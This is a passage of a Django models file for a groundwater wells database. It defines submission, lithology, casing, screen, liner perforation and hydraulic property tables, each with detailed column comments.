boundary_effect = models.ForeignKey(BoundaryEffectCode, db_column='boundary_effect_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Boundary Effect',
db_comment='Valid codes for the boundaries observed in '
'pumping test analysis. i.e. CH, NF.')
aquifer_lithology = models.ForeignKey(
AquiferLithologyCode, db_column='aquifer_lithology_code', blank=True, null=True,
on_delete=models.PROTECT,
verbose_name="Aquifer Lithology")
# Production data related data
yield_estimation_method = models.ForeignKey(
YieldEstimationMethodCode, db_column='yield_estimation_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Estimation Method')
yield_estimation_rate = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='Estimation Rate',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.00'))])
yield_estimation_duration = models.DecimalField(
max_digits=9, decimal_places=2, verbose_name='Estimation Duration',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.01'))])
static_level_before_test = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='SWL Before Test',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.0'))])
drawdown = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True,
validators=[MinValueValidator(Decimal('0.00'))])
hydro_fracturing_performed = models.BooleanField(
null=True,
verbose_name='Hydro-fracturing Performed?',
choices=((False, 'No'), (True, 'Yes')))
hydro_fracturing_yield_increase = models.DecimalField(
max_digits=7, decimal_places=2,
verbose_name='Well Yield Increase Due to Hydro-fracturing',
blank=True, null=True,
validators=[MinValueValidator(Decimal('0.00'))])
recommended_pump_depth = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Recommended pump depth',
validators=[MinValueValidator(Decimal('0.00'))])
recommended_pump_rate = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Recommended pump rate',
validators=[MinValueValidator(Decimal('0.00'))])
class Meta:
db_table = 'activity_submission'
db_table_comment = 'Submission of data and information related to a groundwater wells.'
db_column_supplemental_comments = {
"alternative_specs_submitted":"Indicates if an alternative specification was used for siting of a water supply well, or a permanent dewatering well, or for the method used for decommissioning a well.",
"analytic_solution_type":"Mathematical formulation used to estimate hydraulic parameters.",
"aquifer_id":"System generated sequential number assigned to each aquifer. It is widely used by groundwater staff as it is the only consistent unique identifier for a mapped aquifer. It is also commonly referred to as Aquifer Number.",
"artesian_conditions": "Artesian conditions arise when there is a movement of groundwater from a recharge area under a confining formation to a point of discharge at a lower elevation. An example of this is a natural spring, or in the example of the drilling industry, a flowing water well.",
"aquifer_lithology_code":"Valid codes for the type of material an aquifer consists of. i.e., Unconsolidated, Bedrock, Unknown.",
"aquifer_vulnerability_index":"Valid codes that Indicate the aquifer’s relative intrinsic vulnerability to impacts from human activities at the land surface. Vulnerability is based on: the type, thickness, and extent of geologic materials above the aquifer, depth to water table (or to top of confined aquifer), and type of aquifer materials. E.g. H, L, M",
"bedrock_depth":"Depth below ground level at which bedrock starts, measured in feet.",
"boundary_effect_code":"Valid codes for the boundaries observed in pumping test analysis. i.e. CH, NF.",
"city":"The city or town in which the well is located as part of the well location address.",
"comments":"Free form text used by the user (driller or staff) to include comments for the well. ",
"consultant_company":"Name of consultant company that was involved in the construction, alteration, or decommision of a well.",
"consultant_name":"Name of consultant (person) that was involved in the construction, alteration, or decommision of a well.",
"decommission_backfill_material":"Backfill material used to decommission a well. ",
"decommission_details":"Information about the decommissioning of a well as provided by the driller.",
"decommission_method_code":"Valid code for the method used to fill the well to close it permanently.",
"decommission_reason":"The reason why the well was decomssioned as provided by the driller.",
"decommission_sealant_material":"Describes the sealing material or a mixture of the sealing material used to decommission a well.",
"development_hours":"Total hours devoted to developing as well ('develop' in relation to a well, means remove from an aquifer the fine sediment and other organic or inorganic material that immediately surrounds the well screen, the drill hole or the intake area at the bottom of the well)",
"development_notes":"Information about the development of the well.",
"drawdown":"Drawdown is the drop in water level when water is being pumped. ",
"filter_pack_from":"The starting depth below ground level at which the filter pack was placed.",
"filter_pack_material_code":"Codes for the materials used in the filter pack, which are placed in the annulus of the well between the borehole wall and the well screen, and are used to settle-out fine grained particles that may otherwise enter the well. I.e. Fine gravel, very course sand, very fine gravel, other",
"filter_pack_material_size_code":"Codes for the sizes of the material used to pack a well filter. E.g. 1.0 - 2.0 mm, 2.0 - 4.0 mm, 4.0 - 8.0 mm.",
"filter_pack_thickness":"The thickness in inches of the filter pack material used for a well.",
"filter_pack_to":"The end depth below ground level at which the filter pack was placed.",
"final_casing_stick_up":"The length of the production casing in the well that is above the surface of the ground adjacent to the well, or the floor of the well sump, pump house or well pit.",
"geom":"Estimated point location of the well. All UTM coordinates are converted to this geom column for storage and display. The geometry of the well should be considered aong with the coordinate acquisition code to get the estimated accuracy of the location.",
"ground_elevation":"The elevation above sea-level at the ground-level of the well, measured in feet.",
"ground_elevation_method_code":"Code for method used to determine the ground elevation of a well. E.g. GPS, Altimeter, Differential GPS, Level, 1:50,000 map, 1:20,000 map.",
"hydraulic_conductivity":"The ability of the rock or unconsolidated material to transmit water.",
"hydro_fracturing_performed":"Indicates if high pressure water was injected into the well to help break apart the bedrock in order to get more water out of the well.",
"hydro_fracturing_yield_increase":"How much the well yeild increases once hydro fracturing was performed, measured in US gallons per minute.",
"id_plate_attached_by":"The person who attached the id plate to the well.",
"intended_water_use_code":"The intended use of the water in a water supply well as reported by the driller at time of work completion on the well. E.g, DOM, IRR, DWS, COM, UNK, OTHER",
"internal_comments":"Staff only comments and information related to the well, and for internal use only, not to be made public.",
"land_district_code":"Codes used to identify legal land district used to help identify the property where the well is located. E.g. Alberni, Barclay, Cariboo.",
"legal_pid":"A Parcel Identifier or PID is a nine-digit number that uniquely identifies a parcel in the land title register of in BC. The Registrar of Land Titles assigns PID numbers to parcels for which a title is being entered in the land title register as a registered title. The Land Title Act refers to the PID as “the permanent parcel identifier”.",
"liner_diameter":"Diameter of the liner placed inside the well. Measured in inches.",
"liner_from":"Depth below ground level at which the liner starts inside the well. Measured in feet.",
"liner_material_code":"Code that describes the material noted for lithology. E.g. Rock, Clay, Sand, Unspecified,",
"liner_thickness":"Thickness of the liner inside the well. Measured in inches.",
"liner_to":"Depth below ground level at which the liner ends inside the well. Measured in feet.",
"other_screen_bottom":"Describes the type of bottom installed on a well screen of when the bottom type is different from all the types in the screen bottom drop down list and the data submitter picks 'Other ' from the list.",
"other_screen_material":"Describes the material that makes up the screen on a well when the material is different from all the drop down options and the data submitter picks 'Other ' from the list.",
"owner_city":"City where the owner of the well resides.",
"owner_email":"Email address of the well owner, not to be published to the public. ",
"owner_full_name":"First name and last name of the well owner. ",
"owner_mailing_address":"Street name and number of the well owner.",
"owner_postal_code":"Postal code of the well owner attached to the owner mailing address.",
"owner_tel":"Telephone number for the well owner, not to be published to the public.",
"province_state_code":"Province or state code used for the mailing address for the company",
"recommended_pump_depth":"Depth of the a pump placed within the well, as recommended by the well driller or pump installer, measured in feet below depth of the production casing.",
"recommended_pump_rate":"The rate at which to withdraw water from the well as recommended by the well driller or pump installer, measured in US gallons per minute.",
"screen_bottom_code":"Valid categories used to identify the type of bottom on a well screen. It provides for a standard commonly understood code and description for screen bottoms. Some examples include: Bail, Plate, Plug. 'Other' can also be specified.",
"screen_information":"Information about the screen that is not captured elsewhere, as provided by the well driller.",
"screen_intake_method_code":"Valid categories used to identify the type of intake mechanism for a well screen. It provides for a standard commonly understood code and description for screen intake codes. Some examples include: Open bottom, Screen, Uncased hole.",
"screen_material_code":"Describes the different materials that makes up the screen on a well. E.g. Plastic, Stainless Steel, Other.",
"screen_opening_code":"Valid categories used to identify the type of opening on a well screen. It provides for a standard commonly understood code and description for screen openings. E.g. Continuous Slot, Perforated Pipe, Slotted.",
"screen_type_code":"Valid categories for the type of well screen installed in a well. i.e. Pipe size, Telescope, Other",
"specific_storage":"The volume of water that the aquifer releases from storage, per volume per aquifer of hydraulic unit head.",
"static_level_before_test":"Resting static water level prior to pumping, measured in feet below ground level.",
"storativity":"The storativity (or storage coefficient ) is the amount of water stored or released per unit area of aquifer given unit change in head. ",
"street_address":"Street address for where the property that the well is physically located on.",
"surface_seal_depth":"The depth at the bottom of the surface seal, measured in feet.",
"surface_seal_material_code":"Valid materials used for creating the surface seal for a well. A surface seal is a plug that prevents surface runoff from getting into the aquifer or well and contaminating the water. E.g. Bentonite clay, Concrete grout, Sand cement grout, Other.",
"surface_seal_method_code":"Valid methods used to create the surface seal for a well. i.e. Poured, Pumped, Other.",
"surface_seal_thickness":"The thickness of the surface sealant placed in the annular space around the outside of the outermost well casing, measured in inches.",
"total_depth_drilled":"Total depth of drilling done when constructing or altering a well. It is different from the finished well depth which can be shallower than the total well depth. Measured in feet.",
"transmissivity":"Transmissivity is the rate of flow under a unit hydraulic gradient through a unit width of aquifer of thickness ",
"water_quality_odour":"Description of the odour of the water as recorded at time of work.",
"well_cap_type":"Description of the type of well cap used on the well.",
"well_disinfected":"Indicates if the well was disinfected after the well construction or alteration was completed.",
"well_orientation":"Describes the physical orientation of a well as being either horizontal or vertical.",
"well_publication_status_code":"Codes that describe if a well record is published for public consumption or unpublished and not available to the public due to data duplication and other data quality issues.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
"well_yield":"An approximate estimate of the capacity of the well to produce groundwater. Estimated by the well driller during construction by conducting a well yield test. Measured in US Gallons/minute.",
"well_yield_unit_code":"Codes for the unit of measure that was used for the well yield. All codes except the U.S. Gallons per Minute has been retired as all data from April 2019 will be reported in U.S. Gallons per Minute. E.g of other codes that have been used in the past are Gallons per Minute (U.S./Imperial), Dry Hole, Unknown Yield.",
"yield_estimation_duration":"Total length of time that a well yield test took to complete, measured in hours.",
"yield_estimation_method_code":"Codes for the valid methods that can be used to estimate the yield of a well. E.g. Air Lifting, Bailing, Pumping, Other.",
"yield_estimation_rate":"Rate at which the well water was pumped during the well yield test, measured in US gallons per minute.",
}
def __str__(self):
if self.filing_number:
return '%s %d %s %s' % (self.activity_submission_guid, self.filing_number,
self.well_activity_type.code, self.street_address)
else:
return '%s %s' % (self.activity_submission_guid, self.street_address)
def latitude(self):
if self.geom:
return self.geom.y
else:
return None
def longitude(self):
if self.geom:
return self.geom.x
else:
return None
def save(self, *args, **kwargs):
if not self.update_date:
self.update_date = timezone.now()
if self._state.adding is True:
if not self.create_date:
self.create_date = timezone.now()
return super().save(*args, **kwargs)
class FieldsProvided(models.Model):
""" Fields that were filled out in a submission report or staff edit.
Not all fields are provided in every report or edit, and this model
helps track which fields the user intended to update.
"""
activity_submission = models.OneToOneField(ActivitySubmission, on_delete=models.PROTECT, primary_key=True, db_column="filing_number", related_name="fields_provided")
well_activity_type = models.BooleanField(default=False)
well_status = models.BooleanField(default=False)
well_publication_status = models.BooleanField(default=False)
well_class = models.BooleanField(default=False)
well_subclass = models.BooleanField(default=False)
intended_water_use = models.BooleanField(default=False)
person_responsible = models.BooleanField(default=False)
company_of_person_responsible = models.BooleanField(default=False)
driller_name = models.BooleanField(default=False)
consultant_name = models.BooleanField(default=False)
consultant_company = models.BooleanField(default=False)
work_start_date = models.BooleanField(default=False)
work_end_date = models.BooleanField(default=False)
construction_start_date = models.BooleanField(default=False)
construction_end_date = models.BooleanField(default=False)
alteration_start_date = models.BooleanField(default=False)
alteration_end_date = models.BooleanField(default=False)
decommission_start_date = models.BooleanField(default=False)
decommission_end_date = models.BooleanField(default=False)
owner_full_name = models.BooleanField(default=False)
owner_mailing_address = models.BooleanField(default=False)
owner_city = models.BooleanField(default=False)
owner_province_state = models.BooleanField(default=False)
owner_postal_code = models.BooleanField(default=False)
owner_email = models.BooleanField(default=False)
owner_tel = models.BooleanField(default=False)
street_address = models.BooleanField(default=False)
city = models.BooleanField(default=False)
legal_lot = models.BooleanField(default=False)
legal_plan = models.BooleanField(default=False)
legal_district_lot = models.BooleanField(default=False)
legal_block = models.BooleanField(default=False)
legal_section = models.BooleanField(default=False)
legal_township = models.BooleanField(default=False)
legal_range = models.BooleanField(default=False)
land_district = models.BooleanField(default=False)
legal_pid = models.BooleanField(default=False)
well_location_description = models.BooleanField(default=False)
identification_plate_number = models.BooleanField(default=False)
well_identification_plate_attached = models.BooleanField(default=False)
id_plate_attached_by = models.BooleanField(default=False)
geom = models.BooleanField(default=False)
coordinate_acquisition_code = models.BooleanField(default=False)
ground_elevation = models.BooleanField(default=False)
ground_elevation_method = models.BooleanField(default=False)
drilling_methods = models.BooleanField(default=False)
well_orientation = models.BooleanField(default=False)
well_orientation_status = models.BooleanField(default=False)
water_supply_system_name = models.BooleanField(default=False)
water_supply_system_well_name = models.BooleanField(default=False)
surface_seal_material = models.BooleanField(default=False)
surface_seal_depth = models.BooleanField(default=False)
surface_seal_thickness = models.BooleanField(default=False)
surface_seal_method = models.BooleanField(default=False)
backfill_above_surface_seal = models.BooleanField(default=False)
backfill_above_surface_seal_depth = models.BooleanField(default=False)
backfill_depth = models.BooleanField(default=False)
backfill_type = models.BooleanField(default=False)
liner_material = models.BooleanField(default=False)
liner_diameter = models.BooleanField(default=False)
liner_thickness = models.BooleanField(default=False)
liner_from = models.BooleanField(default=False)
liner_to = models.BooleanField(default=False)
screen_intake_method = models.BooleanField(default=False)
screen_type = models.BooleanField(default=False)
screen_material = models.BooleanField(default=False)
other_screen_material = models.BooleanField(default=False)
screen_opening = models.BooleanField(default=False)
screen_bottom = models.BooleanField(default=False)
other_screen_bottom = models.BooleanField(default=False)
screen_information = models.BooleanField(default=False)
filter_pack_from = models.BooleanField(default=False)
filter_pack_to = models.BooleanField(default=False)
filter_pack_thickness = models.BooleanField(default=False)
filter_pack_material = models.BooleanField(default=False)
filter_pack_material_size = models.BooleanField(default=False)
development_methods = models.BooleanField(default=False)
development_hours = models.BooleanField(default=False)
development_notes = models.BooleanField(default=False)
water_quality_characteristics = models.BooleanField(default=False)
water_quality_colour = models.BooleanField(default=False)
water_quality_odour = models.BooleanField(default=False)
total_depth_drilled = models.BooleanField(default=False)
finished_well_depth = models.BooleanField(default=False)
final_casing_stick_up = models.BooleanField(default=False)
bedrock_depth = models.BooleanField(default=False)
static_water_level = models.BooleanField(default=False)
well_yield = models.BooleanField(default=False)
artesian_flow = models.BooleanField(default=False)
artesian_pressure = models.BooleanField(default=False)
artesian_pressure_head = models.BooleanField(default=False)
artesian_conditions = models.BooleanField(default=False)
well_cap_type = models.BooleanField(default=False)
well_disinfected = models.BooleanField(default=False)
well_disinfected_status = models.BooleanField(default=False)
comments = models.BooleanField(default=False)
internal_comments = models.BooleanField(default=False)
alternative_specs_submitted = models.BooleanField(default=False)
well_yield_unit = models.BooleanField(default=False)
diameter = models.BooleanField(default=False)
ems = models.BooleanField(default=False)
observation_well_number = models.BooleanField(default=False)
observation_well_status = models.BooleanField(default=False)
aquifer = models.BooleanField(default=False)
decommission_reason = models.BooleanField(default=False)
decommission_method = models.BooleanField(default=False)
decommission_sealant_material = models.BooleanField(default=False)
decommission_backfill_material = models.BooleanField(default=False)
decommission_details = models.BooleanField(default=False)
aquifer_vulnerability_index = models.BooleanField(default=False)
storativity = models.BooleanField(default=False)
transmissivity = models.BooleanField(default=False)
hydraulic_conductivity = models.BooleanField(default=False)
specific_storage = models.BooleanField(default=False)
specific_yield = models.BooleanField(default=False)
testing_method = models.BooleanField(default=False)
testing_duration = models.BooleanField(default=False)
analytic_solution_type = models.BooleanField(default=False)
boundary_effect = models.BooleanField(default=False)
aquifer_lithology = models.BooleanField(default=False)
yield_estimation_method = models.BooleanField(default=False)
yield_estimation_rate = models.BooleanField(default=False)
yield_estimation_duration = models.BooleanField(default=False)
static_level_before_test = models.BooleanField(default=False)
drawdown = models.BooleanField(default=False)
hydro_fracturing_performed = models.BooleanField(default=False)
hydro_fracturing_yield_increase = models.BooleanField(default=False)
recommended_pump_depth = models.BooleanField(default=False)
recommended_pump_rate = models.BooleanField(default=False)
lithologydescription_set = models.BooleanField(default=False)
casing_set = models.BooleanField(default=False)
decommission_description_set = models.BooleanField(default=False)
screen_set = models.BooleanField(default=False)
linerperforation_set = models.BooleanField(default=False)
class Meta:
db_table = 'fields_provided'
class LithologyDescription(AuditModel):
"""
Lithology information details
"""
lithology_description_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4, editable=False)
activity_submission = models.ForeignKey(
ActivitySubmission, db_column='filing_number', on_delete=models.PROTECT, blank=True, null=True,
related_name='lithologydescription_set')
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT, blank=True, null=True,
related_name='lithologydescription_set',
db_comment=('The file number assigned to a particular well in the in the province\'s Groundwater '
'Wells and Aquifers application.'))
start = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='From',
blank=True, null=True,
db_column='lithology_from',
validators=[MinValueValidator(Decimal('0.00'))],
db_comment=('Depth below ground surface of the start of the lithology material for a particular '
'lithology layer, as observed during the construction or alteration of a well, '
'measured in feet.'))
end = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='To',
db_column='lithology_to',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.01'))],
db_comment=('Depth below ground surface of the end of the lithology material for a particular '
'lithology layer as observed during the construction or alteration of a well, measured '
'in feet.'))
lithology_raw_data = models.CharField(
max_length=250, blank=True, null=True, verbose_name='Raw Data',
db_comment=('Lithologic material as described verbatim by the driller (not necessarily using '
'standardized terms).'))
lithology_description = models.ForeignKey(
LithologyDescriptionCode,
db_column='lithology_description_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name="Description",
db_comment=('Standard terms used to characterize the different qualities of lithologic'
' materials. E.g. dry, loose, weathered, soft.'))
lithology_colour = models.ForeignKey(
LithologyColourCode, db_column='lithology_colour_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Colour',
db_comment=('Valid options for the colour of the lithologic material identified at time of'
' drilling. E.g. Black, dark, tan, rust-coloured'))
lithology_hardness = models.ForeignKey(
LithologyHardnessCode, db_column='lithology_hardness_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Hardness',
db_comment=('The hardness of the material that a well is drilled into (the lithology), e.g. Very'
' hard, Medium, Very Soft.'))
lithology_material = models.ForeignKey(
LithologyMaterialCode, db_column='lithology_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name="Material",
db_comment=('Description of the lithologic material using standardized terms, '
'e.g. Rock, Clay, Sand, Unspecified.'))
water_bearing_estimated_flow = models.DecimalField(
max_digits=10, decimal_places=4, blank=True, null=True, verbose_name='Water Bearing Estimated Flow')
water_bearing_estimated_flow_units = models.ForeignKey(
WellYieldUnitCode, db_column='well_yield_unit_code', on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Units')
lithology_observation = models.CharField(
max_length=250, blank=True, null=True, verbose_name='Observations',
db_comment=('Free form text used by the driller to describe observations made of the well '
'lithology including, but not limited to, the lithologic material.'))
bedrock_material = models.ForeignKey(
BedrockMaterialCode, db_column='bedrock_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Bedrock Material',
db_comment=('Code for the bedrock material encountered during drilling and reported in'
' lithologic description.'))
bedrock_material_descriptor = models.ForeignKey(
BedrockMaterialDescriptorCode, db_column='bedrock_material_descriptor_code', on_delete=models.PROTECT,
blank=True, null=True, verbose_name='Descriptor',
db_comment=('Code for adjective that describes the characteristics of the bedrock material in'
' more detail.'))
lithology_structure = models.ForeignKey(LithologyStructureCode, db_column='lithology_structure_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Bedding')
lithology_moisture = models.ForeignKey(LithologyMoistureCode, db_column='lithology_moisture_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Moisture')
surficial_material = models.ForeignKey(SurficialMaterialCode, db_column='surficial_material_code',
related_name='surficial_material_set', on_delete=models.PROTECT,
blank=True, null=True, verbose_name='Surficial Material')
secondary_surficial_material = models.ForeignKey(SurficialMaterialCode,
db_column='secondary_surficial_material_code',
related_name='secondary_surficial_material_set',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Secondary Surficial Material')
lithology_sequence_number = models.BigIntegerField(blank=True, null=True)
class Meta:
db_table = 'lithology_description'
ordering = ["start", "end"]
db_table_comment = ('Describes the different lithologic qualities, characteristics, and materials found '
'at different depths while drilling.')
db_column_supplemental_comments = {
"bedrock_material_code":"Code for the bedrock material encountered during drilling and reported in lithologic description. ",
"lithology_moisture_code":"Code that describes the level of water within the lithologic layer. i.e. Dry, Damp, Moist, Wet",
"lithology_sequence_number":"Check with developers to see if this is being used, or if it can be deleted.",
"water_bearing_estimated_flow":"Estimated flow of water within the lithologic layer, either recorded in US Gallons Per Minute or as per the well_yield_unit_code column.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
}
def __str__(self):
if self.activity_submission:
return 'activity_submission {} {} {}'.format(self.activity_submission, self.start,
self.end)
else:
return 'well {} {} {}'.format(self.well, self.start, self.end)
class PerforationBase(AuditModel):
"""
Perforation in a well liner
"""
liner_perforation_guid = models.UUIDField(primary_key=True, default=uuid.uuid4,
editable=False)
start = models.DecimalField(db_column='liner_perforation_from', max_digits=7, decimal_places=2,
verbose_name='Perforated From', blank=False,
validators=[MinValueValidator(Decimal('0.00'))])
end = models.DecimalField(db_column='liner_perforation_to', max_digits=7, decimal_places=2,
verbose_name='Perforated To', blank=False,
validators=[MinValueValidator(Decimal('0.01'))])
class Meta:
abstract = True
class LinerPerforation(PerforationBase):
"""
Perforation in a well liner
"""
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT, blank=True,
null=True, related_name='linerperforation_set',
db_comment=('The file number assigned to a particular well in the in the province\'s Groundwater '
'Wells and Aquifers application.'))
class Meta:
ordering = ["start", "end"]
db_table = 'liner_perforation'
db_table_comment = ('Describes the depths at which the liner is perforated in a well to help improve '
'water flow at the bottom of the well. Some wells are perforated instead of having '
'a screen installed.')
db_column_supplemental_comments = {
"liner_perforation_from":"The depth at the top of the liner perforation, measured in feet below ground level.",
"liner_perforation_to":"The depth at the bottom of the liner perforation, measured in feet below ground level.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
}
def __str__(self):
return 'well {} {} {}'.format(self.well, self.start, self.end)
class ActivitySubmissionLinerPerforation(PerforationBase):
"""
Perforation in a well liner
"""
activity_submission = models.ForeignKey(ActivitySubmission, db_column='filing_number',
on_delete=models.PROTECT, blank=True, null=True,
related_name='linerperforation_set')
class Meta:
ordering = ["start", "end"]
db_table_comment = ('Describes the depths at which the liner is perforated in a well to help improve '
'water flow at the bottom of the well. Some wells are perforated instead of having '
'a screen installed.')
def __str__(self):
return 'activity_submission {} {} {}'.format(self.activity_submission,
self.start,
self.end)
class Casing(AuditModel):
"""
Casing information
A casing may be associated to a particular submission, or to a well.
"""
casing_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4, editable=False)
activity_submission = models.ForeignKey(ActivitySubmission, db_column='filing_number',
on_delete=models.PROTECT, blank=True, null=True,
related_name='casing_set')
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT,
blank=True, null=True,
related_name='casing_set',
db_comment=('The file number assigned to a particular well in the in the province\'s Groundwater '
'Wells and Aquifers application.'))
# 2018/Sep/26 - According to PO (Lindsay), diameter, start and end are required fields.
# There is however a lot of legacy data that does not have this field.
start = models.DecimalField(db_column='casing_from', max_digits=7, decimal_places=2, verbose_name='From',
null=True, blank=True, validators=[MinValueValidator(Decimal('0.00'))])
end = models.DecimalField(db_column='casing_to', max_digits=7, decimal_places=2, verbose_name='To',
null=True, blank=True, validators=[MinValueValidator(Decimal('0.01'))])
# NOTE: Diameter should be pulling from screen.diameter
diameter = models.DecimalField(
max_digits=8, decimal_places=3, verbose_name='Diameter', null=True,
blank=True, validators=[MinValueValidator(Decimal('0.5'))],
db_comment=('The diameter as measure in inches of the casing of the well. There can be multiple '
'casings in a well, e.g. surface casing, and production casing. Diameter of casing made '
'available to the public is generally the production casing.'))
casing_code = models.ForeignKey(CasingCode, db_column='casing_code', on_delete=models.PROTECT,
verbose_name='Casing Type Code', null=True)
casing_material = models.ForeignKey(CasingMaterialCode, db_column='casing_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Casing Material Code')
wall_thickness = models.DecimalField(max_digits=6, decimal_places=3, verbose_name='Wall Thickness',
blank=True, null=True,
validators=[MinValueValidator(Decimal('0.01'))])
drive_shoe_status = models.ForeignKey(DriveShoeCode, db_column='drive_shoe_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Drive Shoe Code')
class Meta:
ordering = ["start", "end"]
db_table = 'casing'
db_table_comment = ('Piping or tubing installed in a well to support the sides of the well. The casing '
'is comprised of a production (inner tube) and surface (outer tube) and can be made '
'of a variety of materials.')
db_column_supplemental_comments = {
"casing_code":"Describes the casing component (piping or tubing installed in a well) as either production casing, surface casing (outer casing), or open hole.",
"casing_from":"The depth below ground level at which the casing begins. Measured in feet below ground level.",
"casing_to":"The depth below ground level at which the casing ends. Measured in feet below ground level.",
"diameter":"The diameter of the casing measured in inches. There can be multiple casings in a well, e.g. surface casing, and production casing. Diameter of casing made available to the public is generally the production casing.",
"drive_shoe_code":"Indicates Y or N if a drive shoe was used in the installation of the casing. A drive shoe is attached to the end of a casing and it helps protect it during installation.",
"wall_thickness":"The thickness of the casing wall, measured in inches.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
}
def __str__(self):
if self.activity_submission:
return 'activity_submission {} {} {}'.format(self.activity_submission, self.start, self.end)
else:
return 'well {} {} {}'.format(self.well, self.start, self.end)
def as_dict(self):
return {
"start": self.start,
"end": self.end,
"casing_guid": self.casing_guid,
"well_tag_number": self.well_tag_number,
"diameter": self.diameter,
"wall_thickness": self.wall_thickness,
"casing_material": self.casing_material,
"drive_shoe_status": self.drive_shoe_status
}
class Screen(AuditModel):
"""
Screen in a well
"""
screen_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4, editable=False)
activity_submission = models.ForeignKey(ActivitySubmission, db_column='filing_number',
on_delete=models.PROTECT, blank=True, null=True,
related_name='screen_set')
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT, blank=True,
null=True, related_name='screen_set',
db_comment=('System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.'))
start = models.DecimalField(db_column='screen_from', max_digits=7, decimal_places=2, verbose_name='From',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.00'))])
end = models.DecimalField(db_column='screen_to', max_digits=7, decimal_places=2, verbose_name='To',
blank=False, null=True, validators=[MinValueValidator(Decimal('0.01'))])
diameter = models.DecimalField(db_column='screen_diameter', max_digits=7, decimal_places=2, verbose_name='Diameter',
blank=True, null=True,
validators=[MinValueValidator(Decimal('0.0'))])
assembly_type = models.ForeignKey(
ScreenAssemblyTypeCode, db_column='screen_assembly_type_code', on_delete=models.PROTECT, blank=True,
null=True)
slot_size = models.DecimalField(max_digits=7, decimal_places=2, verbose_name='Slot Size',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.00'))])
class Meta:
db_table = 'screen'
ordering = ['start', 'end']
db_table_comment = ('Describes the screen type, diameter of screen, and the depth at which the screen is'
' installed in a well.')
def __str__(self):
if self.activity_submission:
return 'activity_submission {} {} {}'.format(self.activity_submission, self.start,
self.end)
else:
return 'well {} {} {}'.format(self.well, self.start, self.end)
class WaterQualityColour(CodeTableModel):
"""
Colour choices for describing water quality
"""
code = models.CharField(primary_key=True, max_length=32,
db_column='water_quality_colour_code')
description = models.CharField(max_length=100)
class Meta:
db_table = 'water_quality_colour_code'
db_table_comment = ('Valid values of the colour of the water as recorded at time of work. E.g. Orange,'
' Black, Clear, Other')
def __str__(self):
return self.description
class HydraulicProperty(AuditModel):
"""
Hydraulic properties of the well, usually determined via tests.
"""
hydraulic_property_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4, editable=False)
well = models.ForeignKey(
Well, db_column='well_tag_number', to_field='well_tag_number',
on_delete=models.PROTECT, blank=False, null=False,
db_comment=('The file number assigned to a particular well in the in the province\'s Groundwater '
'Wells and Aquifers application.'))
avi = models.DecimalField(
max_digits=10, decimal_places=0, blank=True, null=True, verbose_name='AVI')
storativity = models.DecimalField(
max_digits=8, decimal_places=7, blank=True, null=True, verbose_name='Storativity')
transmissivity = models.DecimalField(
max_digits=30, decimal_places=10, blank=True, null=True, verbose_name='Transmissivity')
hydraulic_conductivity = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Hydraulic Conductivity')
specific_storage = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Specific Storage')
specific_yield = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Specific Yield')
testing_method = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Testing Method')
testing_duration = models.PositiveIntegerField(blank=True, null=True)
analytic_solution_type = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Analytic Solution Type')
boundary_effect = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Boundary Effect')
class Meta:
db_table = 'hydraulic_property'
verbose_name_plural = 'Hydraulic Properties'
db_table_comment = 'Placeholder table comment.'
db_column_supplemental_comments = {
"analytic_solution_type":"The mathematical solution to the groundwater flow equation used to fit the observational data and estimate hydraulic parameters e.g. Theis 1935",
"avi":"The Aquifer Vulnerability Index (AVI) method for calculating aquifer vulnerability to contamination based on the thickness of each sedimentary unit above the uppermost aquifer and estimated hydraulic conductivity of each of these layers. ",
